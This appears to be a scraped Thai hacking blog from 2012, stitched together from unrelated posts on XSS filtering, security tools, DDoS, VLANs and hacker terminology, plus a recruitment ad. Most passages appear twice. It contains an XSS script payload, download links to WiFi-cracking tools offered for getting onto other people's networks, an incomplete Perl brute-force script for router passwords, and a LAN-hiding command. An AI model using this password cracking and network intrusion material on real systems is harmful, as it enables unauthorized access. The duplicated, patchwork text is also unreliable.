ถ้าข้อมูลที่เราได้รับเป็นแบบนี้
somepage.aspx?foo=<script>alert('vulnerable XSS code')</script>
ฝั่ง Server เราก็เขียนก็แค่เขียน filter เพื่อป้องกันไม่ให้ script นี้สามารถ รันได้
การโจมตีสามารถทำได้โดย การเขียน script ฝั่งลงไปกับข้อมูล (Cross site scripting attacks) หรือการหาช่ิองทางของคำสั่ง query ในฐานข้อมูลเพื่อดึงข้อมูลที่ต้องการออกมา (SQL injection attacks) สามารถทำได้หลากหลายรูปแบบ และเป็นสิ่งที่เราน่าจะเรียนรู้เพื่อนำไปสู่วิธี่การป้องกันที่ดี ลองคิดดูว่าการเขียนโปรแกรมของเรามีการจัดการเรื่องพวกนี้ได้ดีแค่ไหน หรือ ดีพอหรือยัง มาดูตัวอย่างการป้องกันที่เราคิดว่าน่าจะเพียงพอ
ถ้าข้อมูลที่เราได้รับเป็นแบบนี้
somepage.aspx?foo=<script>alert('vulnerable XSS code')</script>
ฝั่ง Server เราก็เขียนก็แค่เขียน filter เพื่อป้องกันไม่ให้ script นี้สามารถ รันได้
20 เครื่องมือด้านความปลอดภัย
20 เครื่องมือด้านความปลอดภัย
เครื่องมือชุดเดียวกันนั้นอาจใช้ได้ทั้งในการโจมตี และป้องกันระบบ
ในวงการ Security มีเรื่องแปลกอย่างหนึ่ง ที่ยากจะหาได้ในสาขาอื่นๆ ของคอมพิวเตอร์ นั่นก็คือเรื่องของแฮ็กเกอร์และผู้ดูแลระบบความปลอดภัย ที่ต่างก็ใช้ความรู้เดียวกัน เครื่องมือชุดเดียวกัน ในวัตถุประสงค์ที่แตกต่างกันอย่างสิ้นเชิง ฝ่ายหนึ่งใช้ความรู้และเครื่องมือเพื่อโจมตี แต่อีกฝ่ายใช้ความรู้และเครื่องมือเพื่อป้องกัน อาจเรียกได้ว่าเป็น ?คนละด้านของดอลลาร์เดียวกัน? ในบทความนี้ผมจะแนะนำให้รู้จักกับเครื่องมือต่างๆ จำนวน 20 โปรแกรม บางโปรแกรมสามารถทำหน้าที่ได้ทั้งโจมตีและป้องกัน บางโปรแกรมก็เป็นโปรแกรมป้องกันเพียงอย่างเดียว
การจัดลำดับ 20 เครื่องมือนี้ ผมไม่ได้จัดเองหรอกครับ แต่เป็นการสำรวจของหน่วยงานที่ชื่อว่า InSecure.org ผู้สร้างโปรแกรม NMAP อันลือลั่น เป็นผู้จัดทำขึ้น โดยสอบถามจากผู้ที่มีอีเมล์อยู่ในลิสต์ (Mailing List) ของ InSecure.org ซึ่งถือว่าเป็นลิสต์ที่ครอบคลุมผู้ที่อยู่ในวงการ มากพอควร ดังนั้นการจัดอันดับนี้จึงสมควรเชื่อถือได้ ในชุดโปรแกรมนี้ มีหลายๆ โปรแกรมที่สามารถนำไปใช้งานด้านมืดได้ แต่ก็สามารถนำไปใช้ประโยชน์ได้เช่นกัน เพราะการป้องกันที่ดีอย่างหนึ่ง ก็คือการทดลองโจมตีตัวเอง ดังนั้นรู้จักเครื่องมือเหล่านี้ไว้ ก็คงไม่เสียหลาย ก็ขอเริ่มเลยก็แล้วกันนะครับ โดยลำดับนี้จะเรียงตามความนิยมมากไปหาน้อยตามลำดับ
1) Nessus
เครื่องมือชุดเดียวกันนั้นอาจใช้ได้ทั้งในการโจมตี และป้องกันระบบ
ในวงการ Security มีเรื่องแปลกอย่างหนึ่ง ที่ยากจะหาได้ในสาขาอื่นๆ ของคอมพิวเตอร์ นั่นก็คือเรื่องของแฮ็กเกอร์และผู้ดูแลระบบความปลอดภัย ที่ต่างก็ใช้ความรู้เดียวกัน เครื่องมือชุดเดียวกัน ในวัตถุประสงค์ที่แตกต่างกันอย่างสิ้นเชิง ฝ่ายหนึ่งใช้ความรู้และเครื่องมือเพื่อโจมตี แต่อีกฝ่ายใช้ความรู้และเครื่องมือเพื่อป้องกัน อาจเรียกได้ว่าเป็น ?คนละด้านของดอลลาร์เดียวกัน? ในบทความนี้ผมจะแนะนำให้รู้จักกับเครื่องมือต่างๆ จำนวน 20 โปรแกรม บางโปรแกรมสามารถทำหน้าที่ได้ทั้งโจมตีและป้องกัน บางโปรแกรมก็เป็นโปรแกรมป้องกันเพียงอย่างเดียว
การจัดลำดับ 20 เครื่องมือนี้ ผมไม่ได้จัดเองหรอกครับ แต่เป็นการสำรวจของหน่วยงานที่ชื่อว่า InSecure.org ผู้สร้างโปรแกรม NMAP อันลือลั่น เป็นผู้จัดทำขึ้น โดยสอบถามจากผู้ที่มีอีเมล์อยู่ในลิสต์ (Mailing List) ของ InSecure.org ซึ่งถือว่าเป็นลิสต์ที่ครอบคลุมผู้ที่อยู่ในวงการ มากพอควร ดังนั้นการจัดอันดับนี้จึงสมควรเชื่อถือได้ ในชุดโปรแกรมนี้ มีหลายๆ โปรแกรมที่สามารถนำไปใช้งานด้านมืดได้ แต่ก็สามารถนำไปใช้ประโยชน์ได้เช่นกัน เพราะการป้องกันที่ดีอย่างหนึ่ง ก็คือการทดลองโจมตีตัวเอง ดังนั้นรู้จักเครื่องมือเหล่านี้ไว้ ก็คงไม่เสียหลาย ก็ขอเริ่มเลยก็แล้วกันนะครับ โดยลำดับนี้จะเรียงตามความนิยมมากไปหาน้อยตามลำดับ
1) Nessus
การจู่โจมระบบ (Denial of Service)
การโจมตีแบบ Distributed Denial of Service (DDoS)
มักจะนำเครื่องมือที่จะใช้ในการโจมตีไปติดตั้งบนเครื่องที่ถูกเจาะไว้แล้ว ซึ่งมีจำนวนพอสมควร จากนั้นจึงจะระดมส่งข้อมูลในรูปแบบที่ควบคุมได้โดยผู้ควบคุมการโจมตีไปยังเหยื่อหรือเป้าหมายที่ต้องการ ซึ่งการโจมตีรูปแบบนี้มักจะก่อให้เกิดการใช้แบนด์วิดธ์อย่างเต็มที่จนผู้อื่นไม่สามารถใช้งานได้ตามปกติ หรือทำให้ระบบที่ถูกโจมตีไม่มีทรัพยากรเหลือพอที่จะให้บริการผู้ใช้ธรรมดาได้
การป้องกันการโจมตีแบบ DoS นั้น จะสามารถทำได้ก็ต่อเมื่อทราบวิธีของการโจมตีก่อน และการป้องกันการโจมตีในบางครั้งก็ไม่สามารถทำได้ในครั้งเดียว ขึ้นอยู่กับรูปแบบการโจมตี สถาปัตยกรรมของเป้าหมายที่ถูกโจมตี ซึ่งการป้องกันอาจจะได้ผลหรือล้มเหลวก็ขึ้นอยู่กับปัจจัยเหล่านี้คือ
การมีคู่มือหรืเอกสารการใช้งานของระบบเป้าหมายที่ถูกโจมตี
การตรวจจับการโจมตีสามารถทำได้อย่างรวดเร็วและสามารถค้นหาต้นตอที่แท้จริงได้
มีวิธีดำเนินการสนองตอบเหตุการณ์ละเมิดความปลอดภัยอย่างเป็นขั้นตอน (incident response)
และการป้องกันรูปแบบอื่นที่สามารถทำได้
รูปแบบการโจมตีและการป้องกัน
เครื่องมือที่ใช้โจมตีแบบ DDoS มีใช้กันอย่างแพร่หลายมานานหลายปีแล้ว และบรรดาผู้ผลิตเองต่างก็มีวิธีป้องกันการโจมตีเช่นเดียวกัน รูปแบบการโจมตีที่นิยมใช้กันก็มีอย่าง SYN flood, UDP flood, ICMP flood, Smurf, Fraggle เป็นต้น ซึ่งจะได้ศึกษาในรายละเอียดและวิธีป้องกันกันต่อไป
มักจะนำเครื่องมือที่จะใช้ในการโจมตีไปติดตั้งบนเครื่องที่ถูกเจาะไว้แล้ว ซึ่งมีจำนวนพอสมควร จากนั้นจึงจะระดมส่งข้อมูลในรูปแบบที่ควบคุมได้โดยผู้ควบคุมการโจมตีไปยังเหยื่อหรือเป้าหมายที่ต้องการ ซึ่งการโจมตีรูปแบบนี้มักจะก่อให้เกิดการใช้แบนด์วิดธ์อย่างเต็มที่จนผู้อื่นไม่สามารถใช้งานได้ตามปกติ หรือทำให้ระบบที่ถูกโจมตีไม่มีทรัพยากรเหลือพอที่จะให้บริการผู้ใช้ธรรมดาได้
การป้องกันการโจมตีแบบ DoS นั้น จะสามารถทำได้ก็ต่อเมื่อทราบวิธีของการโจมตีก่อน และการป้องกันการโจมตีในบางครั้งก็ไม่สามารถทำได้ในครั้งเดียว ขึ้นอยู่กับรูปแบบการโจมตี สถาปัตยกรรมของเป้าหมายที่ถูกโจมตี ซึ่งการป้องกันอาจจะได้ผลหรือล้มเหลวก็ขึ้นอยู่กับปัจจัยเหล่านี้คือ
การมีคู่มือหรืเอกสารการใช้งานของระบบเป้าหมายที่ถูกโจมตี
การตรวจจับการโจมตีสามารถทำได้อย่างรวดเร็วและสามารถค้นหาต้นตอที่แท้จริงได้
มีวิธีดำเนินการสนองตอบเหตุการณ์ละเมิดความปลอดภัยอย่างเป็นขั้นตอน (incident response)
และการป้องกันรูปแบบอื่นที่สามารถทำได้
รูปแบบการโจมตีและการป้องกัน
เครื่องมือที่ใช้โจมตีแบบ DDoS มีใช้กันอย่างแพร่หลายมานานหลายปีแล้ว และบรรดาผู้ผลิตเองต่างก็มีวิธีป้องกันการโจมตีเช่นเดียวกัน รูปแบบการโจมตีที่นิยมใช้กันก็มีอย่าง SYN flood, UDP flood, ICMP flood, Smurf, Fraggle เป็นต้น ซึ่งจะได้ศึกษาในรายละเอียดและวิธีป้องกันกันต่อไป
ทำความรู้จักกับโปรแกรมตรวจสอบและค้นหาจุดที่ล่อแหลมต่อการถูกโจมตี
ทำความรู้จักกับโปรแกรมตรวจสอบและค้นหาจุดที่ล่อแหลมต่อการถูกโจมตี
ใน ปัจจุบันมีนวัตกรรมด้านการรักษาความปลอดภัยเกิดขึ้นอย่างมากมายตามกระแสของ ยุคโลกาภิวัฒน์ เพราะยิ่งเทคโนโลยีก้าวไกลไปเท่าไร ก็ดูเหมือนว่าโจรผู้ร้ายก็เพิ่มขึ้นเป็นเงาตามตัวอยู่อย่างนั้น และเมื่อในขณะนี้คอมพิวเตอร์เข้ามามีบทบาทในชีวิตประจำวันของเราๆ ท่านๆ อยู่ทุกขณะจิต แน่นอนว่าอาชญากรทางคอมพิวเตอร์ก็จ้องที่จะแสวงหาผลประโยชน์ จากความพลาดพลั้งหรือรู้เท่าไม่ถึงการณ์หรือแม้กระทั่งความโง่เขลาของผู้ใช้ คอมพิวเตอร์อยู่เสมอๆ
หากคุณกำลังวางแผนที่จะทำธุรกิจอิเลกทรอนิกส์ (E-business) ความปลอดภัยในธุรกิจ ต้องมาเป็นอันดับ 1 แน่นอน แต่ในปัจจุบันการรักษาความปลอดภัยในเรื่องเงินๆ ทองๆ ถือเป็นเกมที่อันตรายมากสุดๆ เลยก็ว่าได้ ถ้าไม่เชื่อคุณลองพิจารณาตามข้อเท็จจริงที่ว่า จุดบกพร่องหรือจุดที่ล่อแหลมต่อการถูกโจมตีโดยแฮกเกอร์ในระบบถูกตรวจพบได้ นับร้อยในแต่ละปี สคริปต์แก้ไขข้อบกพร่อง (patch) ใหม่ๆ นับสิบมีให้อัปเดตทุกเดือน ระบบรักษาความปลอดภัยนับพันที่พร้อมจะล้าหลังได้ตลอดเวลา ด้วยเหตุผลเหล่านี้หากคุณต้องการที่จะติดต่อเพื่อตกลงด้านการเงินกับลูกค้า ระดับของระบบรักษาความปลอดภัยของคุณต้องเป็นระดับขั้นสุดยอด ประหนึ่งว่า ปิดทุกจุดอ่อนที่เคยมีการโจมตีในประวัติศาสตร์โลก มิหนำซ้ำ ระบบของคุณต้องทำงานอย่างไร้ข้อผิดพลาดปราศจากสิ่งที่ไม่พึงประสงค์โดยที่ คุณต้องซ่อมแซมทุกข้อบกพร่องในระบบในทุกๆ เวลาที่เปิดเครื่อง แต่ผู้ไม่ประสงค์ดีทั้งหลายต้องการเพียงแค่จุดอ่อนเพียงจุดเดียวท่านั้น เพื่อเข้าไปทำลายทุกๆ อย่างที่คุณมี !
ใน ปัจจุบันมีนวัตกรรมด้านการรักษาความปลอดภัยเกิดขึ้นอย่างมากมายตามกระแสของ ยุคโลกาภิวัฒน์ เพราะยิ่งเทคโนโลยีก้าวไกลไปเท่าไร ก็ดูเหมือนว่าโจรผู้ร้ายก็เพิ่มขึ้นเป็นเงาตามตัวอยู่อย่างนั้น และเมื่อในขณะนี้คอมพิวเตอร์เข้ามามีบทบาทในชีวิตประจำวันของเราๆ ท่านๆ อยู่ทุกขณะจิต แน่นอนว่าอาชญากรทางคอมพิวเตอร์ก็จ้องที่จะแสวงหาผลประโยชน์ จากความพลาดพลั้งหรือรู้เท่าไม่ถึงการณ์หรือแม้กระทั่งความโง่เขลาของผู้ใช้ คอมพิวเตอร์อยู่เสมอๆ
หากคุณกำลังวางแผนที่จะทำธุรกิจอิเลกทรอนิกส์ (E-business) ความปลอดภัยในธุรกิจ ต้องมาเป็นอันดับ 1 แน่นอน แต่ในปัจจุบันการรักษาความปลอดภัยในเรื่องเงินๆ ทองๆ ถือเป็นเกมที่อันตรายมากสุดๆ เลยก็ว่าได้ ถ้าไม่เชื่อคุณลองพิจารณาตามข้อเท็จจริงที่ว่า จุดบกพร่องหรือจุดที่ล่อแหลมต่อการถูกโจมตีโดยแฮกเกอร์ในระบบถูกตรวจพบได้ นับร้อยในแต่ละปี สคริปต์แก้ไขข้อบกพร่อง (patch) ใหม่ๆ นับสิบมีให้อัปเดตทุกเดือน ระบบรักษาความปลอดภัยนับพันที่พร้อมจะล้าหลังได้ตลอดเวลา ด้วยเหตุผลเหล่านี้หากคุณต้องการที่จะติดต่อเพื่อตกลงด้านการเงินกับลูกค้า ระดับของระบบรักษาความปลอดภัยของคุณต้องเป็นระดับขั้นสุดยอด ประหนึ่งว่า ปิดทุกจุดอ่อนที่เคยมีการโจมตีในประวัติศาสตร์โลก มิหนำซ้ำ ระบบของคุณต้องทำงานอย่างไร้ข้อผิดพลาดปราศจากสิ่งที่ไม่พึงประสงค์โดยที่ คุณต้องซ่อมแซมทุกข้อบกพร่องในระบบในทุกๆ เวลาที่เปิดเครื่อง แต่ผู้ไม่ประสงค์ดีทั้งหลายต้องการเพียงแค่จุดอ่อนเพียงจุดเดียวท่านั้น เพื่อเข้าไปทำลายทุกๆ อย่างที่คุณมี !
วันพุธที่ 4 เมษายน พ.ศ. 2555
Hackเล่นเน็ตที่ไหนก็ได้ + วิธีใช้อย่างละเอียด
Hackเล่นเน็ตที่ไหนก็ได้ + วิธีใช้อย่างละเอียด
มีทั้งหมด 4 โปรแกรมนะครับ อยากให้ลองใช้ดูทุกตัว เพราะไฟล์มันเล็ก วิธีใช้ด้านในครับ
ทดลองใช้ค้นหาพาสของ wifi ทั่วไป ได้ประมาน 90 เปอ นะคับ แหะๆ
http://www.duckload.com/download/3162299/aircrack-ng-0_1_.9.3-win.rar
http://www.duckload.com/download/3162391/Hack_Wireless.rar
http://www.duckload.com/download/3162439/HackWireless.rar
http://www.duckload.com/download/3162453/WIRELESS.rar
http://www.duckload.com/download/3162485/_.rar
credit zeed5
ข้อมูลจาก ruk-com.in.th
มีทั้งหมด 4 โปรแกรมนะครับ อยากให้ลองใช้ดูทุกตัว เพราะไฟล์มันเล็ก วิธีใช้ด้านในครับ
ทดลองใช้ค้นหาพาสของ wifi ทั่วไป ได้ประมาน 90 เปอ นะคับ แหะๆ
http://www.duckload.com/download/3162299/aircrack-ng-0_1_.9.3-win.rar
http://www.duckload.com/download/3162391/Hack_Wireless.rar
http://www.duckload.com/download/3162439/HackWireless.rar
http://www.duckload.com/download/3162453/WIRELESS.rar
http://www.duckload.com/download/3162485/_.rar
credit zeed5
ข้อมูลจาก ruk-com.in.th
hack web ของไทย
ทุกวันนี้ คงไม่มีบริษัทใดที่ไม่มี Website เป็นของตัวเอง บางบริษัทอาจจะเช่า Web Hosting อยู่ หรือ บางบริษัทอาจมี Web Site เป็นของตนเองอยู่ในระบบเครือข่ายของบริษัท โดยมีการต่อเชื่อมเครือข่ายของบริษัทด้วย Frame Relay, ADSL หรือ Leased Line เข้ากับระบบเครือข่ายของ ISP ซึ่งส่วนใหญ่ก็จะมีการจัดซื้อ Firewall มาใช้ป้องกันระบบเครือข่ายภายในของบริษัท กับ ระบบอินเทอร์เน็ตจาก ISP และ มีการเปิดให้คนภายนอกสามารถเข้ามาเยี่ยมชม Web Site ได้ โดยเปิด Port TCP 80 http และ Port TCP 443 https ในกรณีที่ใช้โปรโตคอล SSL ในการเข้ารหัสข้อมูลเพื่อเพิ่มความปลอดภัยมากยิ่งขึ้น
ปัญหาก็คือ ในเมื่อทุกบริษัทต้องเปิดทางให้มีการเข้าชม Web Site ทั้งแบบ Plain text traffic (Port 80) และแบบ Encrypted text traffic (port 443) ทำให้แฮกเกอร์สามารถจู่โจม Web Site ของเราโดยไม่ต้องเจาะผ่าน Firewall เนื่องจากเป็น Port ที่ Firewall มีความจำเป็นต้องเปิดใช้อยู่แล้ว
ในโลกของ E-Commerce มีอัตราการใช้งาน Web Server ที่เพิ่มขึ้นทุกวัน (ดูข้อมูลจากwww.netcraft.com) และ จากข้อมูลของ UNCTAD http://www.unctad.org พบว่า Web Server ทั่วโลก มีทั้งแบบที่เข้ารหัสด้วย SSL แล้ว และ แบบไม่เข้ารหัสด้วย SSL ก็ยังคงมีใช้กันอยู่
ปัญหาก็คือ ในเมื่อทุกบริษัทต้องเปิดทางให้มีการเข้าชม Web Site ทั้งแบบ Plain text traffic (Port 80) และแบบ Encrypted text traffic (port 443) ทำให้แฮกเกอร์สามารถจู่โจม Web Site ของเราโดยไม่ต้องเจาะผ่าน Firewall เนื่องจากเป็น Port ที่ Firewall มีความจำเป็นต้องเปิดใช้อยู่แล้ว
ในโลกของ E-Commerce มีอัตราการใช้งาน Web Server ที่เพิ่มขึ้นทุกวัน (ดูข้อมูลจากwww.netcraft.com) และ จากข้อมูลของ UNCTAD http://www.unctad.org พบว่า Web Server ทั่วโลก มีทั้งแบบที่เข้ารหัสด้วย SSL แล้ว และ แบบไม่เข้ารหัสด้วย SSL ก็ยังคงมีใช้กันอยู่
วันศุกร์ที่ 30 มีนาคม พ.ศ. 2555
ขอโปรโมตหนังสือเกี่ยวกับ Computer Security ที่ผมเขียนเองครับ :)
ไหนๆก็ช่วงงานสัปดาห์หนังสือพอดี ขอโปรโมตหน่อยละกันครับ :)
รายละเอียดหนังสือ
http://naiin.com/pro.../23792/Hacking-
รายละเอียดหนังสือ
http://naiin.com/pro.../23792/Hacking-
วันพุธที่ 28 มีนาคม พ.ศ. 2555
Hacker และ Cracker ต่างกันยังไง
เชื่อว่าหลายๆคนในที่นี้คงจะคุ้นเคยกับบุคคลทั้งสองประเภทดังคำกล่าวข้างต้นมาแล้วบ้างนะครับ แม้จะยังไม่เข้าใจความหมายแน่ชัดนักว่าทั้งสองคำนี้เหมือนหรือแตกต่างกันอย่างไร วันนี้เราจะได้มาพูดถึงเรื่องนี้กัน ส่วนใครที่เป็นเซียนคอมพิวเตอร์และยังทำตัวเป็น Hacker หรือว่า Cracker กันอยู่ บทความตรงนี้ก็น่าสนใจมากสำหรับคุณเลยทีเดียว เอาล่ะครับเราจะมาดูกันต่อไป
ความหมายของ Hacker และ Cracker
เนื่องจากยังไม่มีนิยามศัพท์ตามกฎหมายที่จะบอกความหมายของคำว่า Hacker
และ Cracker ได้จึงต้องดูจากความหมายโดยทั่วไปที่ใช้ในวงการคอมพิวเตอร์ ในที่นี้มีความหมายของ Phracker เข้ามาด้วย (เพิ่งเคยได้ยินเหมือนกันครับ คำนี้)
- Hacker is and individual who is a greedly computer-savvy
enthusiast, capable of manipulating a remote computer.
- Phracker , a term given to "Phone Freaks", who have and use the
knowledge to make unauthorized long distance phone calls using a variety of methods such as card, codes , and tones.
- Cracker is a breed of both hacker and phracker , with the skill
to break the access codes to sensitive corporate, and government networks.
( See " Hacker, Phracker,and Cracker" by J.R. Minor : http://www.ols.net/user/iz/mitnk.htm )
ความหมายของ Hacker และ Cracker
เนื่องจากยังไม่มีนิยามศัพท์ตามกฎหมายที่จะบอกความหมายของคำว่า Hacker
และ Cracker ได้จึงต้องดูจากความหมายโดยทั่วไปที่ใช้ในวงการคอมพิวเตอร์ ในที่นี้มีความหมายของ Phracker เข้ามาด้วย (เพิ่งเคยได้ยินเหมือนกันครับ คำนี้)
- Hacker is and individual who is a greedly computer-savvy
enthusiast, capable of manipulating a remote computer.
- Phracker , a term given to "Phone Freaks", who have and use the
knowledge to make unauthorized long distance phone calls using a variety of methods such as card, codes , and tones.
- Cracker is a breed of both hacker and phracker , with the skill
to break the access codes to sensitive corporate, and government networks.
( See " Hacker, Phracker,and Cracker" by J.R. Minor : http://www.ols.net/user/iz/mitnk.htm )
วันจันทร์ที่ 19 มีนาคม พ.ศ. 2555
มาCrack พาสเวิร์ดของ Router กันบ้าง
นี่Code Perl
#!/usr/bin/perl
print "*****************************************
_____________________
< Brute Authentication >
---------------------
| ,__,
| (oo)____
(__) )\
||--|| * \n";
print "* code by windows98SE *\n";
print "*****************************************\n";
use Socket;
use IO::Socket;
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
print "IP:";
chomp( my $target = <STDIN> );
my @userlist = readFile("user.txt");
my @passlist = readFile("pass.txt");
my $outfile = 'PW.txt';
my %result;
print "[+] Start Scan..\n";
scan($target);
print "[+] Done.\n";
system ("pause");
print "*****************************************
_____________________
< Brute Authentication >
---------------------
| ,__,
| (oo)____
(__) )\
||--|| * \n";
print "* code by windows98SE *\n";
print "*****************************************\n";
use Socket;
use IO::Socket;
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
print "IP:";
chomp( my $target = <STDIN> );
my @userlist = readFile("user.txt");
my @passlist = readFile("pass.txt");
my $outfile = 'PW.txt';
my %result;
print "[+] Start Scan..\n";
scan($target);
print "[+] Done.\n";
system ("pause");
เทคนิคการซ่อนตัวในวง LAN และ wireless ไม่ให้รู้ว่าเราเป็นใคร(หากซ้ำ ขอโทษด้วย)
เทคนิคการซ่อนตัว(hide)ในวง LAN และ wireless ไม่ให้รู้ว่าเราเป็นใคร ! สำหรับคนที่ไม่อยากแสดงตัว ต่อ โปรแกรม scan ต่างๆ
1. ไปที่ start > Run พิมพ์ cmd แล้ว Enter
2. ในหน้าต่าง dos ให้ทำดังนี้ครับ
ถ้าอยาก hide พิมพ์คำว่า net config server /hidden:yes แล้ว Enter
ถ้าไม่อยาก hide พิมพ์คำว่า net config server /hidden:n แล้ว Enter
เท่านี้เราก็จะไม่แสดงตัวตนที่แท้จริงในระดับนึงครับ !
ขอบคุงครับ เครดิต nairong
:)
ข้อมูลจาก ruk-com.in.th
1. ไปที่ start > Run พิมพ์ cmd แล้ว Enter
2. ในหน้าต่าง dos ให้ทำดังนี้ครับ
ถ้าอยาก hide พิมพ์คำว่า net config server /hidden:yes แล้ว Enter
ถ้าไม่อยาก hide พิมพ์คำว่า net config server /hidden:n แล้ว Enter
เท่านี้เราก็จะไม่แสดงตัวตนที่แท้จริงในระดับนึงครับ !
ขอบคุงครับ เครดิต nairong
:)
ข้อมูลจาก ruk-com.in.th
ทำงานผ่านเน็ต อาทิตย์ละ 3000 - 5000 บาท/สัปดาห์ สนใจรายละเอียดคลิก!!
เปิดรับสมัคร นิสิตนักศึกษา ปิดภาคเรียน และบุคคลทั่วไป ทำงานพิเศษเพิ่มรายได้เสริมTHE FIRST POWER SYSTEM
เป็นบริษัทที่จัดทำสื่อโฆษณาโดยสื่อโฆษณาที่ใช้จะเป็นสื่อออนไลน์บนหน้าอินเทอร์เน็ตทั้งหมด เพื่อใช้ในการโปรโมทสื่อโฆษณาผ๋านเว็ปไซต์ โดยสื่อโฆษณาที่ใช้จะมีอยู่หลายรูปแบบด้วยกัน
ผู้ที่สนใจสามารถเลือกทำได้ทั้งแบบ Part time และ Full time สามารถเลือกเวลาทำงานได้
ด่วนรับจำนวนจำกัด !!!
คุณสมบัติ
- ชาย/หญิง อายุ 18 ปี ขึ้นไป
- ไม่จำเป็นต้องมีประสบการณ์ทำงาน ( เพราะมีระบบสอนงานให้ )
- สามารถใช้คอมพิวเตอร์ และ Internet ได้
- ยินดีรับนักศึกษาที่อยากหารายได้เสริม หรือคนทำงานประจำ
- เปิดรับทั้งในรูปแบบ งาน Part time และ full time
เพียงคุณพร้อมที่จะเรียนรู้ระบบและทำงานกับเรา เพียงเท่านั้นคุณก็สามารถทำธุรกิจของตัวเองได้ ทางบริษัทจะมีทีมงานสนับสนุนคุณ
**** สมัครงาน หรือรับข้อมูลเพิ่มเติม ****
เบอร์โทร 088-1874277 (นิล),
CLICK และกรอกข้อมูลตรงนี้
http://www.thefirst-one.com/clients/home/032415
(ถ้ากรอกข้อมูลไม่ได้ copy http://www.thefirst-one.com/clients/home/032415 วางลงในช่อง URL นะคับ)
ข้อมูลจาก ruk-com.in.th
วันเสาร์ที่ 17 มีนาคม พ.ศ. 2555
VLAN INTRODUCTION, เดี่ยวนี้การทำตัวเป็นSniffer ลำบาก ใคอยากเป็นก็ควรรู้เรื่องนี
พอดี ผมลองหา โปรแกรม แสกนต่างๆ โปรแกรมดัก โปรแกรมที่ใช้ในการ hackต่างๆ มาใช้ ปรากฏว่า ใช้ไม่ได้ ก็เลยพยายามหาสาเหตุตั้งนาน
ก็พบว่ามันเป็นอย่างนี้นี่เอง
ไม่พูดมากเอาไปเลยละกัน
VLAN คืออะไร
VLAN ย่อมาจาก Virtual LAN เป็นเทคโนโลยีที่ใช้ในการจำลองสร้างเครือข่าย LAN แต่ไม่ขึ้นอยู่กับการต่อทางกายภาพเช่น สวิตช์หนึ่งตัวสามารถใช้จำลองเครือข่าย LAN ได้ห้าเครือข่าย หรือสามารถใช้สวิตช์สามตัวจำลองเครือข่าย LAN เพียงหนึ่งเครือข่าย เป็นต้น
ในการสร้าง VLAN โดยใช้อุปกรณ์เครือข่ายหลายตัว จะมีพอร์ตที่ทำหน้าที่เชื่อมต่อระหว่างอุปกรณ์เครือข่ายแต่ละตัว เรียก Trunk port ซึ่งเสมือนมีท่อเชื่อม หรือ Trunk เป็นตัวเชื่อมด้วย
เนื่อง จาก VLAN เป็น LAN แบบจำลอง ถึงแม้ว่าจะต่อทางกายภาพอยู่บนอุปกรณ์เครือข่ายตัวเดียวกัน แต่การติดต่อกันนั้นจำเป็นต้องใช้อุปกรณ์ที่มีความสามารถในการค้นหาเส้นทาง เช่น เราเตอร์ หรือสวิตช์เลเยอร์สาม
ลักษณะพิเศษของ VLAN ทั่วๆ ไปคือ
1. VLAN แต่ละเครือข่ายที่ติดต่อกันนั้น จะมีลักษณะเหมือนกับต่อแยกกันด้วยบริดจ์
2. VLAN สามารถต่อข้ามสวิตช์หลายตัวได้
3. ท่อเชื่อม (Trunks) ต่างๆ จะรองรับทราฟฟิกที่คับคั่งของแต่ละ VLAN ได้
ชนิดของ VLAN
1. Layer 1 VLAN : Membership by ports
ใน การแบ่ง VLAN จะใช้พอร์ตบอกว่าเป็นของ VLAN ใด เช่นสมมุติว่าในสวิตช์ที่มี 4 พอร์ต กำหนดให้ พอร์ต 1, 2 และ 4 เป็นของ VLAN เบอร์ 1 และพอร์ตที่ 3 เป็นของ VLAN เบอร์ 2 ดังรูปที่ 1
Port
VLAN
1
1
2
1
3
2
4
1
รูปที่ 1 แสดงการกำหนดพอร์ตให้กับ VLAN
ก็พบว่ามันเป็นอย่างนี้นี่เอง
ไม่พูดมากเอาไปเลยละกัน
VLAN คืออะไร
VLAN ย่อมาจาก Virtual LAN เป็นเทคโนโลยีที่ใช้ในการจำลองสร้างเครือข่าย LAN แต่ไม่ขึ้นอยู่กับการต่อทางกายภาพเช่น สวิตช์หนึ่งตัวสามารถใช้จำลองเครือข่าย LAN ได้ห้าเครือข่าย หรือสามารถใช้สวิตช์สามตัวจำลองเครือข่าย LAN เพียงหนึ่งเครือข่าย เป็นต้น
ในการสร้าง VLAN โดยใช้อุปกรณ์เครือข่ายหลายตัว จะมีพอร์ตที่ทำหน้าที่เชื่อมต่อระหว่างอุปกรณ์เครือข่ายแต่ละตัว เรียก Trunk port ซึ่งเสมือนมีท่อเชื่อม หรือ Trunk เป็นตัวเชื่อมด้วย
เนื่อง จาก VLAN เป็น LAN แบบจำลอง ถึงแม้ว่าจะต่อทางกายภาพอยู่บนอุปกรณ์เครือข่ายตัวเดียวกัน แต่การติดต่อกันนั้นจำเป็นต้องใช้อุปกรณ์ที่มีความสามารถในการค้นหาเส้นทาง เช่น เราเตอร์ หรือสวิตช์เลเยอร์สาม
ลักษณะพิเศษของ VLAN ทั่วๆ ไปคือ
1. VLAN แต่ละเครือข่ายที่ติดต่อกันนั้น จะมีลักษณะเหมือนกับต่อแยกกันด้วยบริดจ์
2. VLAN สามารถต่อข้ามสวิตช์หลายตัวได้
3. ท่อเชื่อม (Trunks) ต่างๆ จะรองรับทราฟฟิกที่คับคั่งของแต่ละ VLAN ได้
ชนิดของ VLAN
1. Layer 1 VLAN : Membership by ports
ใน การแบ่ง VLAN จะใช้พอร์ตบอกว่าเป็นของ VLAN ใด เช่นสมมุติว่าในสวิตช์ที่มี 4 พอร์ต กำหนดให้ พอร์ต 1, 2 และ 4 เป็นของ VLAN เบอร์ 1 และพอร์ตที่ 3 เป็นของ VLAN เบอร์ 2 ดังรูปที่ 1
Port
VLAN
1
1
2
1
3
2
4
1
รูปที่ 1 แสดงการกำหนดพอร์ตให้กับ VLAN
HackTheGame (ทดสอบความสามารถ)
นี้เป็นเกมนะครับ แต่ก็สามารถนำไปประยุกค์ใช้ได้ เกมนี้อาจยากไปสพหรับมือใหม่ คนที่จะเล่นก็ต้องมีพื้นฐาน
มีความรู้ด้าน DOS พอสมควร เพราะเกมนี้ต้องใช้คำสั่ง DOS ในการเล่นครับ สำหรับคนที่ไม่มีพื้นฐาน
ก็เล่นได้นะแต่อาจจะงงสักหน่อย พิมพ์ อาจไปหัดเล่นเกม Hacker Evolution แล้วค่อยมาเล่นเกมนี้ก็ได้ครับ
รูปร่างหน้าตาเกมก็เป็นประมาณนี้ครับ
